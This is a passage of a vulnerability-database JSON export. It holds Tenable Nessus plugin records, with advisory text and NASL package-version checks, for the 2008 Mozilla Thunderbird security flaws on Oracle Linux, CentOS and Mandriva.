7.5}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4070", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2018-08-13T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:thunderbird", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2008-0908.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67754", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0908 and \n# Oracle Linux Security Advisory ELSA-2008-0908 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67754);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/08/13 14:32:37\");\n\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4070\");\n script_xref(name:\"RHSA\", value:\"2008:0908\");\n\n script_name(english:\"Oracle Linux 4 : thunderbird (ELSA-2008-0908)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0908 :\n\nUpdated thunderbird packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail\ncontent. An HTML mail message containing malicious content could cause\nThunderbird to crash or, potentially, execute arbitrary code as the\nuser running Thunderbird. (CVE-2008-0016, CVE-2008-4058,\nCVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed HTML mail content was\ndisplayed. An HTML mail message containing specially crafted content\ncould potentially trick a Thunderbird user into surrendering sensitive\ninformation. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068)\n\nA flaw was found in Thunderbird that caused certain characters to be\nstripped from JavaScript code. This flaw could allow malicious\nJavaScript to bypass or evade script filters. (CVE-2008-4065,\nCVE-2008-4066)\n\nNote: JavaScript support is disabled by default in Thunderbird; the\nabove issue is not exploitable unless JavaScript is enabled.\n\nA heap based buffer overflow flaw was found in the handling of\ncancelled newsgroup messages. If the user cancels a specially crafted\nnewsgroup message it could cause Thunderbird to crash or, potentially,\nexecute arbitrary code as the user running Thunderbird.\n(CVE-2008-4070)\n\nAll Thunderbird users should upgrade to these updated packages, which\nresolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-October/000748.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 189, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"thunderbird-1.5.0.12-16.0.1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:03:42", "references": ["http://www.nessus.org/u?c51af6b2", "http://www.nessus.org/u?68206118", "http://www.nessus.org/u?5ce5c265", "http://www.nessus.org/u?1e2f1969", "http://www.nessus.org/u?6f006b16"], "pluginID": "34339", "description": "Updated thunderbird packages that fix several security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content. An HTML mail message containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code as the user running Thunderbird. (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed HTML mail content was displayed. An HTML mail message containing specially crafted content could potentially trick a Thunderbird user into surrendering sensitive information. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068)\n\nA flaw was found in Thunderbird that caused certain characters to be stripped from JavaScript code. This flaw could allow malicious JavaScript to bypass or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n\nNote: JavaScript support is disabled by default in Thunderbird; the above issue is not exploitable unless JavaScript is enabled.\n\nA heap based buffer overflow flaw was found in the handling of cancelled newsgroup messages. If the user cancels a specially crafted newsgroup message it could cause Thunderbird to crash or, potentially, execute arbitrary code as the user running Thunderbird.\n(CVE-2008-4070)\n\nAll Thunderbird users should upgrade to these updated packages, which resolve these issues.", "edition": 6, "reporter": "Tenable", "published": "2008-10-06T00:00:00", "title": "CentOS 4 / 5 : thunderbird (CESA-2008:0908)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4070", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2018-08-09T00:00:00", "cpe": ["cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:thunderbird", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2008-0908.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=34339", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0908 and \n# CentOS Errata and Security Advisory 2008:0908 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34339);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/08/09 17:06:35\");\n\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4070\");\n script_xref(name:\"RHSA\", value:\"2008:0908\");\n\n script_name(english:\"CentOS 4 / 5 : thunderbird (CESA-2008:0908)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated thunderbird packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail\ncontent. An HTML mail message containing malicious content could cause\nThunderbird to crash or, potentially, execute arbitrary code as the\nuser running Thunderbird. (CVE-2008-0016, CVE-2008-4058,\nCVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed HTML mail content was\ndisplayed. An HTML mail message containing specially crafted content\ncould potentially trick a Thunderbird user into surrendering sensitive\ninformation. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068)\n\nA flaw was found in Thunderbird that caused certain characters to be\nstripped from JavaScript code. This flaw could allow malicious\nJavaScript to bypass or evade script filters. (CVE-2008-4065,\nCVE-2008-4066)\n\nNote: JavaScript support is disabled by default in Thunderbird; the\nabove issue is not exploitable unless JavaScript is enabled.\n\nA heap based buffer overflow flaw was found in the handling of\ncancelled newsgroup messages. If the user cancels a specially crafted\nnewsgroup message it could cause Thunderbird to crash or, potentially,\nexecute arbitrary code as the user running Thunderbird.\n(CVE-2008-4070)\n\nAll Thunderbird users should upgrade to these updated packages, which\nresolve these issues.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2008-October/015292.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1e2f1969\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2008-October/015293.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?68206118\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2008-October/015295.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6f006b16\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2008-October/015296.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c51af6b2\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2008-October/015307.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5ce5c265\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 189, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", reference:\"thunderbird-1.5.0.12-16.el4.centos\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"thunderbird-2.0.0.17-1.el5.centos\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:02:57", "references": ["http://www.mozilla.org/security/announce/2008/mfsa2008-41.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-44.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-46.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-38.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-37.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-43.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-42.html"], "pluginID": "37308", "description": "A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Thunderbird program, version 2.0.0.17 (CVE-2008-0016, CVE-2008-3835, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062, CVE-2008-4065, CVE-2008-4066, CVE-2008-4067, CVE-2008-4068, CVE-2008-4070).\n\nThis update provides the latest Thunderbird to correct these issues.", "edition": 6, "reporter": "Tenable", "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : mozilla-thunderbird (MDVSA-2008:206)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4070", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ro", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-pa_IN", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-tr", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-el", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-sv_SE", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-nl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-da", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-lt", "p-cpe:/a:mandriva:linux:nsinstall", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-sl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pt", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ru", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-es_ES", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-zh_TW", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ja", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-pt_BR", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-de", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-el", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-devel", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-pl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sv", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-moztraybiff", "cpe:/o:mandriva:linux:2008.1", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-it", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-eu", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-mk", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-hu", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-bg", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ca", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sk", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-gu_IN", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-nb", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-cs", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-zh_CN", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ko", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-fr", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ru", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-fi", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-en_GB", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-af", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-fi", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-es", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-pt_PT", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-es_AR", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-tr", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-uk", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-it", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ko", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-he", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-zh_CN", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ja", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-de", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-nb_NO", "p-cpe:/a:mandriva:linux:mozilla-thunderbird", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-fr", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-hu", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-be", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-et_EE", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-es_AR", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-nl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pt_BR", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-nn_NO", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-zh_TW", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ar", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ca", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-sk", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-cs"], "id": "MANDRIVA_MDVSA-2008-206.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=37308", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:206. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(37308);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2018/07/19 20:59:15\");\n\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4070\");\n script_xref(name:\"MDVSA\", value:\"2008:206\");\n\n script_name(english:\"Mandriva Linux Security Advisory : mozilla-thunderbird (MDVSA-2008:206)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of security vulnerabilities have been discovered and\ncorrected in the latest Mozilla Thunderbird program, version 2.0.0.17\n(CVE-2008-0016, CVE-2008-3835, CVE-2008-4058, CVE-2008-4059,\nCVE-2008-4060, CVE-2008-4061, CVE-2008-4062, CVE-2008-4065,\nCVE-2008-4066, CVE-2008-4067, CVE-2008-4068, CVE-2008-4070).\n\nThis update provides the latest Thunderbird to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2008/mfsa2008-37.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2008/mfsa2008-38.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2008/mfsa2008-41.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2008/mfsa2008-42.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2008/mfsa2008-43.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2008/mfsa2008-44.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2008/mfsa2008-46.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 189, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-af\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-be\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-bg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-en_GB\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-es_AR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-nb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-es_AR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-es_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-et_EE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-fr\");\n script_set_attribute(attribute:\"cpe\", 